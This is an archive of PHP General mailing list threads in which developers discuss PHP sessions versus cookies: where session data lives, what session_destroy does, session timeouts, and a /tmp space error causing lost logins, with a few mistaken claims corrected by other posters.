Re: [PHP] Sessions and cookies
Brett Patterson wrote: Well, if you look in your phpinfo() file, you will see a SESSION_TIMEOUT or SESSION_LENGTH value that is something like 18... different for each server. If you hold all your session values in the array, then you can use session_destory(); as long as session_start() is previous to that. ie. you must have an active session for php to destroy it. I am under the impressions that both Sessions and Cookies are stored on the user end, but I may be wrong. the contents of $_SESSION are stored on the server only (unless your doing something very convoluted or wrong IMHO) when a session is started a cookie is also sent to the browser (under certain conditions the session id will be passed via GET param instead - BTWWF), the value of the cookie is the session id, which is used to recognise the browser (when session_start() is called). ... What is also the default life span of a session object? and can this bechanged? check your php config: ? phpinfo(); you can set the lifetime in your script, more info here: http://php.net/session -- BTWWF - Browse The Web (With Firefox ;-) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions and cookies
When a session object is created - where is it store? Assuming you mean session data, it is stored on the server, in /tmp by default. To destroy the session object (widht all session vairables inside the particluar session object) can I use session_destroy(); http://www.php.net/session_destroy says: session_destroy() destroys all of the data associated with the current session. It does not unset any of the global variables associated with the session, or unset the session cookie. This means that session_destroy deletes the particular record from the session data store. It does not act on the cookie nor the $_SESSION superglobal array. Hope that helps. Chris = Chris Shiflett - http://shiflett.org/ PHP Security - O'Reilly HTTP Developer's Handbook - Sams Coming Soon http://httphandbook.org/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Sessions and cookies
When a session object is created - where is it store? (Perhaps on the application server - IIS or Appatche?) Or on a cookking on a user's computer? To destroy the session object (widht all session vairables inside the particluar session object) can I use session_destroy(); What is also the default life span of a session object? and can this bechanged? Reagrds Jacques -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions and cookies
Well, if you look in your phpinfo() file, you will see a SESSION_TIMEOUT or SESSION_LENGTH value that is something like 18... different for each server. If you hold all your session values in the array, then you can use session_destory(); as long as session_start() is previous to that. I am under the impressions that both Sessions and Cookies are stored on the user end, but I may be wrong. ~Brett -Original Message- From: Jacques [mailto:[EMAIL PROTECTED] Sent: Tuesday, February 22, 2005 1:20 AM To: php-general@lists.php.net Subject: [PHP] Sessions and cookies When a session object is created - where is it store? (Perhaps on the application server - IIS or Appatche?) Or on a cookking on a user's computer? To destroy the session object (widht all session vairables inside the particluar session object) can I use session_destroy(); What is also the default life span of a session object? and can this bechanged? Reagrds Jacques -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Opinion: PHP Sessions or Cookies
Just as folks can turn off JavaScript, they can reject cookies. Sessions have some advantages over cookies. [Original Message] From: Ed Lazor [EMAIL PROTECTED] To: [EMAIL PROTECTED] Date: 07/13/2004 2:47:31 PM Subject: [PHP] Opinion: PHP Sessions or Cookies I'm using PHP sessions for user tracking. My host provider's server is dropping session data. He swears it's my scripts and says I should be using cookies for better security. That goes completely opposite to my understanding, so I'd like to run it by you guys. Which is more secure: PHP sessions or cookies? In case you're curious, more details on the specifics of the problem I'm experiencing: I have a prepend file that executes start_session. The script assumes the user is a guest if $_SESSION[UserID] is not set. All guests route to the login screen. Successful authentication sets $_SESSION[UserID] and sends you to the original requested page. It seems fairly straight forward to me. People are able to login and start using the site, but the login screen displays randomly after they've already authenticated successfully. It sounds like PHP session data is being lost on the server. I've also seen error messages on web pages that report PHP / MySQL as having trouble reading from the temp directory. Here's the extact message: ERRORError writing file '/tmp/MYiYcf7q' (Errcode: 28). Anyway, those are the details. I look forward to hearing what you think. -Ed -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Opinion: PHP Sessions or Cookies
Ed Lazor [EMAIL PROTECTED] wrote in message news:[EMAIL PROTECTED] I'm using PHP sessions for user tracking. My host provider's server is dropping session data. He swears it's my scripts and says I should be using cookies for better security. That goes completely opposite to my understanding, so I'd like to run it by you guys. Which is more secure: PHP sessions or cookies? In case you're curious, more details on the specifics of the problem I'm experiencing: I have a prepend file that executes start_session. The script assumes the user is a guest if $_SESSION[UserID] is not set. All guests route to the login screen. Successful authentication sets $_SESSION[UserID] and sends you to the original requested page. It seems fairly straight forward to me. People are able to login and start using the site, but the login screen displays randomly after they've already authenticated successfully. It sounds like PHP session data is being lost on the server. I've also seen error messages on web pages that report PHP / MySQL as having trouble reading from the temp directory. Here's the extact message: ERRORError writing file '/tmp/MYiYcf7q' (Errcode: 28). Hi Ed, have you tried storing your session data in a database? Storing session data in a database has some advances over the standard file based solution, mainly data security und comfort. For example, if you want to get the number of the active sessions just do a simple select count(*) from sessions. Regards, Torsten Roehr -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Opinion: PHP Sessions or Cookies
Except that sessions rely on data being passed to and from the client, usually in a cookie. You can do it yourself by passinf the SID manually or using trans sid, but cookies are the normal way to keep the session working. On Wed, 14 Jul 2004 00:10:17 -0700, Dennis Seavers [EMAIL PROTECTED] wrote: Just as folks can turn off JavaScript, they can reject cookies. Sessions have some advantages over cookies. [Original Message] From: Ed Lazor [EMAIL PROTECTED] To: [EMAIL PROTECTED] Date: 07/13/2004 2:47:31 PM Subject: [PHP] Opinion: PHP Sessions or Cookies I'm using PHP sessions for user tracking. My host provider's server is dropping session data. He swears it's my scripts and says I should be using cookies for better security. That goes completely opposite to my understanding, so I'd like to run it by you guys. Which is more secure: PHP sessions or cookies? In case you're curious, more details on the specifics of the problem I'm experiencing: I have a prepend file that executes start_session. The script assumes the user is a guest if $_SESSION[UserID] is not set. All guests route to the login screen. Successful authentication sets $_SESSION[UserID] and sends you to the original requested page. It seems fairly straight forward to me. People are able to login and start using the site, but the login screen displays randomly after they've already authenticated successfully. It sounds like PHP session data is being lost on the server. I've also seen error messages on web pages that report PHP / MySQL as having trouble reading from the temp directory. Here's the extact message: ERRORError writing file '/tmp/MYiYcf7q' (Errcode: 28). Anyway, those are the details. I look forward to hearing what you think. -Ed -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php !DSPAM:40f4db01325541434715910! -- DB_DataObject_FormBuilder - The database at your fingertips http://pear.php.net/package/DB_DataObject_FormBuilder paperCrane --Justin Patrin-- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Opinion: PHP Sessions or Cookies
I am using PHP sessions for my site. Have done the numbers and have to agree that although cookies make life easier for the developer the whole reason for cookies is to make life easier for the browser. We have to accept that not all users can interrogate a cookie download and verify if the site is safe, so sessions it is :) -- - Michael Mason Arras People www.arraspeople.co.uk - Ed Lazor [EMAIL PROTECTED] wrote in message news:[EMAIL PROTECTED] I'm using PHP sessions for user tracking. My host provider's server is dropping session data. He swears it's my scripts and says I should be using cookies for better security. That goes completely opposite to my understanding, so I'd like to run it by you guys. Which is more secure: PHP sessions or cookies? In case you're curious, more details on the specifics of the problem I'm experiencing: I have a prepend file that executes start_session. The script assumes the user is a guest if $_SESSION[UserID] is not set. All guests route to the login screen. Successful authentication sets $_SESSION[UserID] and sends you to the original requested page. It seems fairly straight forward to me. People are able to login and start using the site, but the login screen displays randomly after they've already authenticated successfully. It sounds like PHP session data is being lost on the server. I've also seen error messages on web pages that report PHP / MySQL as having trouble reading from the temp directory. Here's the extact message: ERRORError writing file '/tmp/MYiYcf7q' (Errcode: 28). Anyway, those are the details. I look forward to hearing what you think. -Ed -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Opinion: PHP Sessions or Cookies
..sessions are easier IMHO On Wed, 14 Jul 2004 16:40:33 +0100, Harlequin [EMAIL PROTECTED] wrote: I am using PHP sessions for my site. Have done the numbers and have to agree that although cookies make life easier for the developer the whole reason for cookies is to make life easier for the browser. We have to accept that not all users can interrogate a cookie download and verify if the site is safe, so sessions it is :) -- - Michael Mason Arras People www.arraspeople.co.uk - Ed Lazor [EMAIL PROTECTED] wrote in message news:[EMAIL PROTECTED] I'm using PHP sessions for user tracking. My host provider's server is dropping session data. He swears it's my scripts and says I should be using cookies for better security. That goes completely opposite to my understanding, so I'd like to run it by you guys. Which is more secure: PHP sessions or cookies? In case you're curious, more details on the specifics of the problem I'm experiencing: I have a prepend file that executes start_session. The script assumes the user is a guest if $_SESSION[UserID] is not set. All guests route to the login screen. Successful authentication sets $_SESSION[UserID] and sends you to the original requested page. It seems fairly straight forward to me. People are able to login and start using the site, but the login screen displays randomly after they've already authenticated successfully. It sounds like PHP session data is being lost on the server. I've also seen error messages on web pages that report PHP / MySQL as having trouble reading from the temp directory. Here's the extact message: ERRORError writing file '/tmp/MYiYcf7q' (Errcode: 28). Anyway, those are the details. I look forward to hearing what you think. -Ed -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php !DSPAM:40f55213116972033915540! -- DB_DataObject_FormBuilder - The database at your fingertips http://pear.php.net/package/DB_DataObject_FormBuilder paperCrane --Justin Patrin-- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Re: Opinion: PHP Sessions or Cookies
-Original Message- have you tried storing your session data in a database? Storing session data in a database has some advances over the standard file based solution, mainly data security und comfort. For example, if you want to get the number of the active sessions just do a simple select count(*) from sessions. I'm not storing sessions into the database right now, but I have before and I'll probably do it again =) -Ed -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Opinion: PHP Sessions or Cookies
-Original Message- have you tried storing your session data in a database? Storing session data in a database has some advances over the standard file based solution, mainly data security und comfort. For example, if you want to get the number of the active sessions just do a simple select count(*) from sessions. I'm not storing sessions into the database right now, but I have before and I'll probably do it again =) I'm doing it with the help of PEAR::DB and PEAR::HTTP_Session - really simple! Are you interested in sample code? Regards, Torsten -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Opinion: PHP Sessions or Cookies
I'm using PHP sessions for user tracking. My host provider's server is dropping session data. He swears it's my scripts and says I should be using cookies for better security. That goes completely opposite to my understanding, so I'd like to run it by you guys. Which is more secure: PHP sessions or cookies? In case you're curious, more details on the specifics of the problem I'm experiencing: I have a prepend file that executes start_session. The script assumes the user is a guest if $_SESSION[UserID] is not set. All guests route to the login screen. Successful authentication sets $_SESSION[UserID] and sends you to the original requested page. It seems fairly straight forward to me. People are able to login and start using the site, but the login screen displays randomly after they've already authenticated successfully. It sounds like PHP session data is being lost on the server. I've also seen error messages on web pages that report PHP / MySQL as having trouble reading from the temp directory. Here's the extact message: ERRORError writing file '/tmp/MYiYcf7q' (Errcode: 28). Anyway, those are the details. I look forward to hearing what you think. -Ed
Re: [PHP] Opinion: PHP Sessions or Cookies
Ed Lazor wrote: I'm using PHP sessions for user tracking. My host provider's server is dropping session data. He swears it's my scripts and says I should be using cookies for better security. That goes completely opposite to my understanding, so I'd like to run it by you guys. Which is more secure: PHP sessions or cookies? Session certainly. It sounds like PHP session data is being lost on the server. I've also seen error messages on web pages that report PHP / MySQL as having trouble reading from the temp directory. Here's the extact message: ERRORError writing file '/tmp/MYiYcf7q' (Errcode: 28). Looks like /tmp directory is out of space. Change the directory to your own, it's more secure anyway. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Opinion: PHP Sessions or Cookies
Sounds like it could be a permissions issue to /tmp, but that's not likely as some work and some don't. More likely, /tmp isn't big enough. Ask the provider to check to see if it's being filled up (you can also check yourself with the 'df' command on the command-line). It could also be an old version of PHP or the timeout settings for sessions. Check that stuff in phpinfo(). On Tue, 13 Jul 2004 14:47:16 -0700, Ed Lazor [EMAIL PROTECTED] wrote: I'm using PHP sessions for user tracking. My host provider's server is dropping session data. He swears it's my scripts and says I should be using cookies for better security. That goes completely opposite to my understanding, so I'd like to run it by you guys. Which is more secure: PHP sessions or cookies? In case you're curious, more details on the specifics of the problem I'm experiencing: I have a prepend file that executes start_session. The script assumes the user is a guest if $_SESSION[UserID] is not set. All guests route to the login screen. Successful authentication sets $_SESSION[UserID] and sends you to the original requested page. It seems fairly straight forward to me. People are able to login and start using the site, but the login screen displays randomly after they've already authenticated successfully. It sounds like PHP session data is being lost on the server. I've also seen error messages on web pages that report PHP / MySQL as having trouble reading from the temp directory. Here's the extact message: ERRORError writing file '/tmp/MYiYcf7q' (Errcode: 28). Anyway, those are the details. I look forward to hearing what you think. -Ed !DSPAM:40f4566021229974011339! -- DB_DataObject_FormBuilder - The database at your fingertips http://pear.php.net/package/DB_DataObject_FormBuilder paperCrane --Justin Patrin-- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Opinion: PHP Sessions or Cookies
-Original Message- Looks like /tmp directory is out of space. Change the directory to your own, it's more secure anyway. I keep watching and /tmp seems ok space-wise, but I like the idea of overriding where session files are stored. I just made that change and I'm waiting for feedback from users to see if they're still getting login prompts. Thanks Marek =) -Ed -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Opinion: PHP Sessions or Cookies
Sessions are the best thing to use, cookies are nice as a supplement. If you want your users to be able to auto-login cookies are just the thing to use, but apart from this cookies are not my favourite. Another thing is that many browsers nowaydays have turned cookies all off.. I remember a friend of mine did a supportsystem where the loggin system was pure cookies... Man - did their staff get a lot of support from people who didnt manage to logg into the system... As mentioned - this were users with cookies turned off As the other users mentioned, the /tmp folder might be out of space, however your provider might also have some custom setup on that server which screws up the /tmp folder here and there. I know for a fact one large provider here in Norway who has this problem on one of their servers due to a heavy site which from time to time sucks up resources resulting in the /tmp folder getting messed up. If you still havnt solved your problem, get your provider to move you to another of his servers (physically!), or change provider. You shouldnt be having theese problems. -- -- Kim Steinhaug - There are 10 types of people when it comes to binary numbers: those who understand them, and those who don't. - www.steinhaug.com - www.easywebshop.no - www.easycms.no www.webkitpro.com - Ed Lazor [EMAIL PROTECTED] wrote in message news:[EMAIL PROTECTED] I'm using PHP sessions for user tracking. My host provider's server is dropping session data. He swears it's my scripts and says I should be using cookies for better security. That goes completely opposite to my understanding, so I'd like to run it by you guys. Which is more secure: PHP sessions or cookies? In case you're curious, more details on the specifics of the problem I'm experiencing: I have a prepend file that executes start_session. The script assumes the user is a guest if $_SESSION[UserID] is not set. All guests route to the login screen. Successful authentication sets $_SESSION[UserID] and sends you to the original requested page. It seems fairly straight forward to me. People are able to login and start using the site, but the login screen displays randomly after they've already authenticated successfully. It sounds like PHP session data is being lost on the server. I've also seen error messages on web pages that report PHP / MySQL as having trouble reading from the temp directory. Here's the extact message: ERRORError writing file '/tmp/MYiYcf7q' (Errcode: 28). Anyway, those are the details. I look forward to hearing what you think. -Ed -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Opinion: PHP Sessions or Cookies
--- Ed Lazor [EMAIL PROTECTED] wrote: I'm using PHP sessions for user tracking. My host provider's server is dropping session data. He swears it's my scripts and says I should be using cookies for better security. That goes completely opposite to my understanding, so I'd like to run it by you guys. Which is more secure: PHP sessions or cookies? First, I'd like to point out that sessions and cookies aren't opposite ideas at all. In fact, PHP's default session mechanism uses cookies for the session identifier (PHPSESSID). The way I interpret your question is to ask whether it's better to store session data on the server (in $_SERVER) or on the client (in cookies). When stored on the client, you rely on the client to send all session data to the server for every single request. These requests are sent across the Internet. The Internet is a public network. Hopefully this makes it clear that storing data on the server is more secure than having it sent across a public network for every single HTTP transaction (multiple transactions are typically required to render a single Web page). I think your instinct (That goes completely opposite to my understanding) serves you well. :-) Chris = Chris Shiflett - http://shiflett.org/ PHP Security - O'Reilly Coming Fall 2004 HTTP Developer's Handbook - Sams http://httphandbook.org/ PHP Community Site http://phpcommunity.org/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Opinion: PHP Sessions or Cookies
On Wednesday 14 July 2004 12:45, Chris Shiflett wrote: The way I interpret your question is to ask whether it's better to store session data on the server (in $_SERVER) or on the client (in cookies). So that people don't get confused: $_SERVER should be $_SESSION. -- Jason Wong - Gremlins Associates - www.gremlins.biz Open Source Software Systems Integrators * Web Design Hosting * Internet Intranet Applications Development * -- Search the list archives before you post http://marc.theaimsgroup.com/?l=php-general -- /* ...though his invention worked superbly -- his theory was a crock of sewage from beginning to end. -- Vernor Vinge, The Peace War */ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] PHP Sessions and Cookies
I have a couple of questions regarding sessions and cookies: 1) Is there a way to append information to a cookie? I have read that it is, but I have also read many problems. Is there any particular way to do this? I ask this because cookies are being generated by two different types of scripts. However, they are both on the same site. So, I have access to them, no problem. I just want to append information to the same cookie. 2) If I append the PHP session id to every url, will PHP skip the cookies completely? I know this is more insecure. This option is only important if I cannot append information to the cookie. Thanks, Paul _ FREE pop-up blocking with the new MSN Toolbar get it now! http://clk.atdmt.com/AVE/go/onm00200415ave/direct/01/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] PHP Sessions and Cookies
Guys/Gals,
I've built a registration page on a site that stores a unique id for a
user when they register. That id is then stored in a database and set as
a session variable and as a cookie and is used to register personal user
preferences.
The reason I use both is that I don't really want to make people log in
everytime they revisit the site. I use the session so that people who
have cookies turned off can still benefit from the personalisation. The
cookie is used so that when a user revisits the site, they don't have to
log in again.
I then have a script that I call in every page that checks for the
session variable and the cookie. I have been testing the script using
echo $_SESSION['usr']; and
echo $_COOKIE['usr'];
and I get correct values for both. Unfortunately if I then close the
browser, reopen it and visit the site, both the cookie and the session
produce no values. Obviously, the session value should be blank, but the
cookie should produce a value.
This is my 'global' cookie/session checker script:
?php
session_start();
// CHECK IF SESSION EXISTS.
if (!isset($_SESSION['usr'])) {
// IF NO, THEN CHECK FOR COOKIE
if (isset($_COOKIE['usr'])) {
// IF 'YES' THEN START SESSION
$_SESSION['usr'] = $_COOKIE['usr'];
}
// IF 'YES' THEN QUIT
}
else {
// IF THE SESSION EXISTS, MAKE SURE [EMAIL PROTECTED] VALUE MATCHES THAT OF THE
COOKIE
setcookie(usr, $_SESSION['usr'],
mktime(21,00,0,12,31,2014),/,bigbarn0.kbnet.net, 0);
// END
}
?
If anyone can point out an error, please do!
Thanks,
Matt
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Sessions or Cookies?
1, What i got to do for manages sessions in my RedHat 8, 2, What i got to do for manages cookies in my RedHat 8, I try to use session vars, but no work I try to use cookies, and when i open two browser, the same cookie is in two browser... this is a problem, I need to carry the user_id in my site, during the cookie life, when use cookies, the problems begin... always got the same cookie, in any browser that i open... :-) Sidar Lopez Cruz - Cero Riesgo, S.A.
Re: [PHP] Sessions or Cookies?
At 15:49 19.02.2003, Sidar Lopez Cruz spoke out and said: [snip] 1, What i got to do for manages sessions in my RedHat 8, 2, What i got to do for manages cookies in my RedHat 8, I try to use session vars, but no work I try to use cookies, and when i open two browser, the same cookie is in two browser... this is a problem, I need to carry the user_id in my site, during the cookie life, when use cookies, the problems begin... always got the same cookie, in any browser that i open... [snip] Cookies are always used by the browser within all windows (from the same browser). You may either instruct clients to use two different browsers (IE, Netscape) at the same time, which seems quite impractical, or simply disable cookies and go with url-based session variables: in your php.ini file, locate the entry session.use_cookie and set it to 0: session.use_cookie = 0 Then restart Apache. This will allow you to use different session ids within the same browser. However you need to find a mechanism to split that up - if a client works on your site and opens a new window with the same url (Ctrl+N, e.g.), the window will initially have the same url, hence the same session id. There's nothing you can do to detect if the request for a particular session comes from another browser window. -- O Ernest E. Vogelsinger (\) ICQ #13394035 ^ http://www.vogelsinger.at/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions and Cookies
I'm trying to use cookies in PHP4 (.whatever the latest release is). I want to use them for validation (ensuring a user has logged in) but all I can find is setcookie, which seems only to create the cookie. In trying to use PHP sessions, I end up with odd errors. When I try to use sessions I get the error message the header has already been sent. I've pasted them below (I was getting different errors before I moved the code before the html tag). Warning: Cannot send session cookie - headers already sent by (output started at /home/allan/public_html/sestest2.php:10) in /home/allan/public_html/verifysession.php on line 6 Warning: Cannot send session cache limiter - headers already sent (output started at /home/allan/public_html/sestest2.php:10) in /home/allan/public_html/verifysession.php on line 6 session_start() must be before html. Solve those problems first because sessions are going to be a better solution than a cookie. My Questions: If I create a cookie with set_cookie how do I read it/check it? Whatever you name the cookie, say 'MyCookie', on the following pages from where you set it, you'll have a $_COOKIE['MyCookie'] variable with it's value. Use that variable just like you would any other. How do I use sessions if they can't be sent in the code? They must be started before output. You can use the values within your code and set/change values within your code. What use are sessions if I can only mess with them in one place? What if I need to do some processing first to decide what to do with them? No problem, see above. ---John Holmes... -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Sessions and Cookies
I'm trying to use cookies in PHP4 (.whatever the latest release is). I want to use them for validation (ensuring a user has logged in) but all I can find is setcookie, which seems only to create the cookie. In trying to use PHP sessions, I end up with odd errors. When I try to use sessions I get the error message the header has already been sent. I've pasted them below (I was getting different errors before I moved the code before the html tag). Warning: Cannot send session cookie - headers already sent by (output started at /home/allan/public_html/sestest2.php:10) in /home/allan/public_html/verifysession.php on line 6 Warning: Cannot send session cache limiter - headers already sent (output started at /home/allan/public_html/sestest2.php:10) in /home/allan/public_html/verifysession.php on line 6 My Questions: If I create a cookie with set_cookie how do I read it/check it? How do I use sessions if they can't be sent in the code? What use are sessions if I can only mess with them in one place? What if I need to do some processing first to decide what to do with them? Any insight is welcome. Allan Cleaveland Webmaster and Computer Technician Math Department Univeristy of Arkansas -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions and Cookies
acleave wrote: My Questions: If I create a cookie with set_cookie how do I read it/check it? $_COOKIE superglobal array. How do I use sessions if they can't be sent in the code? The session_start function has to be at the VERY top of the of the code, below ANY output (even blank spaces and new lines). What use are sessions if I can only mess with them in one place? What if I need to do some processing first to decide what to do with them? You can use them anywhere in your code, but the session_start function has to be before any output (the rest can be anywhere). -- The above message is encrypted with double rot13 encoding. Any unauthorized attempt to decrypt it will be prosecuted to the full extent of the law. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions and Cookies
Well, that is natural - cookies can only be set before any output is produced by the script. And since sessions in this case use cookies, it follows that sessions can also be started before any output is produced. Why is that? Because cookies are transmitted by means of http headers, and http headers precede any content. The approach I find works extremely well is using some kind of design of the scripts, such that the script does some analysis of the situation at the very beginning, processes, saves/loads any data and only then proceeds to display the results. Otherwise, you might want to use buffering. See manual for ob_start(): This function will turn output buffering on. While output buffering is active no output is sent from the script (other than headers), instead the output is stored in an internal buffer. --- So you can use it at the beginning of your scripts. Also, see the config file, php.ini, there is a directive that allows you to enable it globally without modifying scripts: --- ; Output buffering allows you to send header lines (including cookies) even ; after you send body content, at the price of slowing PHP's output layer a ; bit. You can enable output buffering during runtime by calling the output ; buffering functions. You can also enable output buffering for all files by ; setting this directive to On. If you wish to limit the size of the buffer ; to a certain size - you can use a maximum number of bytes instead of 'On', as ; a value for this directive (e.g., output_buffering=4096). output_buffering = On --- Yours trully, --Dmitri - Original Message - From: acleave To: php-general [EMAIL PROTECTED] Sent: Wednesday, February 05, 2003 12:01 AM Subject: [PHP] Sessions and Cookies I'm trying to use cookies in PHP4 (.whatever the latest release is). I want to use them for validation (ensuring a user has logged in) but all I can find is setcookie, which seems only to create the cookie. In trying to use PHP sessions, I end up with odd errors. When I try to use sessions I get the error message the header has already been sent. I've pasted them below (I was getting different errors before I moved the code before the html tag). Warning: Cannot send session cookie - headers already sent by (output started at /home/allan/public_html/sestest2.php:10) in /home/allan/public_html/verifysession.php on line 6 Warning: Cannot send session cache limiter - headers already sent (output started at /home/allan/public_html/sestest2.php:10) in /home/allan/public_html/verifysession.php on line 6 My Questions: If I create a cookie with set_cookie how do I read it/check it? How do I use sessions if they can't be sent in the code? What use are sessions if I can only mess with them in one place? What if I need to do some processing first to decide what to do with them? Any insight is welcome. Allan Cleaveland Webmaster and Computer Technician Math Department Univeristy of Arkansas -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions or Cookies?
Peter Janett wrote: Sessions themselves use cookies, though, right? So, if you want your app to work for those who don't have cookies, you have to pass the session data in the url string, at least that's my understanding. With sessions, its only the session ID that is put in the cookie or url string. The session data stays on the server (usually in a file in /tmp). Its more secure than putting your data out to the client browser where it could be altered before being returned. Regards Chris -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions or Cookies?
Sessions themselves use cookies, though, right? So, if you want your app to work for those who don't have cookies, you have to pass the session data in the url string, at least that's my understanding. Cookies are used by default. However, if cookies are disabled in a client, a session identifier will be passed via URL variable unless session.use_only_cookies is enabled in php.ini. Brad -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions or Cookies?
--- Peter Janett [EMAIL PROTECTED] wrote: Sessions themselves use cookies, though, right? So, if you want your app to work for those who don't have cookies, you have to pass the session data in the url string, at least that's my understanding. That's not quite right. Session management requires an existing method of state management. The default state management mechanism used by PHP is indeed cookies, but that is not the only way. All that is required for state management is that you assign the Web client a unique identifier that it includes on subsequent requests. Cookies make this easy and are somewhat automatic in PHP, but GET and POST variables can also be used. For example, say you normally depend on a cookie to identify the client. This will probably be something like PHPSESSID=12345. The following link would send the same unique identifier as a GET variable: a href=./example.php?PHPSESSID=12345Click Here/a Unless you have PHP configured to only use cookies to identify the client (which I think is not the default setting anyway), it will use the PHPSESSID when sent on the URL like this. In fact, you can configure PHP to append the unique identifier to the URL automatically if the client does not accept cookies. Just set session.use_trans_sid to 1 in your php.ini file if you compiled PHP with --enable_trans_sid. As I hope is clear, none of this requires that any client data be passed on the URL, in cookies, or anything else. The only data that should be sent by the client is data necessary for client identification. All other data can (and should in most cases) be stored on the server. Chris -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Sessions or Cookies?
Hi all, I'm about to create a site where visitors will be able to search, view, surf and add items to a shopping cart without logging in to the site, but will need to do that in order to complete the transaction of course. What I wonder, is what to use to collect information about the items the visitor has chosen in order to show them in the cart section... Should I use the no-so-secure old cookies method or should I start a new session every time a client drops in and handle each cart by session name or ID? Of course I would rather store every visitor's temporary cart in a long MySQL DB and not in their Hard Disks because of those 4 Kb of limit cookies have. Any suggestions? Thanks in advance, Cesar L. Aracena [EMAIL PROTECTED] [EMAIL PROTECTED] (0299) 156-356688 Neuquén (8300) Capital Argentina -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions or Cookies?
--- Cesar Aracena [EMAIL PROTECTED] wrote: Should I use the no-so-secure old cookies method or should I start a new session every time a client drops in and handle each cart by session name or ID? My advice is to only use cookies to identify a Web client. Any data you want to associate with that Web client (user data, for example) should be stored on the server - database, session store, etc. Chris -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Sessions or Cookies?
Agreed. Sessions are much more secure and convienient to use too. Since it's not reliant on the client to have cookies enabled, that's another benefit. Plus it's MUCH harder for a client to spoof/alter a session variable if you use the $_SESSION['myvar'] -Original Message- From: Chris Shiflett [mailto:[EMAIL PROTECTED]] Sent: Friday, January 17, 2003 9:29 AM To: Cesar Aracena; [EMAIL PROTECTED] Subject: Re: [PHP] Sessions or Cookies? --- Cesar Aracena [EMAIL PROTECTED] wrote: Should I use the no-so-secure old cookies method or should I start a new session every time a client drops in and handle each cart by session name or ID? My advice is to only use cookies to identify a Web client. Any data you want to associate with that Web client (user data, for example) should be stored on the server - database, session store, etc. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions or Cookies?
Sessions themselves use cookies, though, right? So, if you want your app to work for those who don't have cookies, you have to pass the session data in the url string, at least that's my understanding. Peter Janett New Media One Web Services New Upgrades Are Now Live!!! Windows 2000 accounts - Cold Fusion 5.0 and Imail 7.1 Sun Solaris (UNIX) accounts - PHP 4.1.2, mod_perl/1.25, Stronghold/3.0 (Apache/1.3.22), MySQL 3.23.43 PostgreSQL coming soon! http://www.newmediaone.net [EMAIL PROTECTED] (303)828-9882 - Original Message - From: Daevid Vincent [EMAIL PROTECTED] To: [EMAIL PROTECTED]; 'Cesar Aracena' [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Friday, January 17, 2003 6:32 PM Subject: RE: [PHP] Sessions or Cookies? Agreed. Sessions are much more secure and convienient to use too. Since it's not reliant on the client to have cookies enabled, that's another benefit. Plus it's MUCH harder for a client to spoof/alter a session variable if you use the $_SESSION['myvar'] -Original Message- From: Chris Shiflett [mailto:[EMAIL PROTECTED]] Sent: Friday, January 17, 2003 9:29 AM To: Cesar Aracena; [EMAIL PROTECTED] Subject: Re: [PHP] Sessions or Cookies? --- Cesar Aracena [EMAIL PROTECTED] wrote: Should I use the no-so-secure old cookies method or should I start a new session every time a client drops in and handle each cart by session name or ID? My advice is to only use cookies to identify a Web client. Any data you want to associate with that Web client (user data, for example) should be stored on the server - database, session store, etc. -- PHP General Mailing List (http://www.php.net/) To 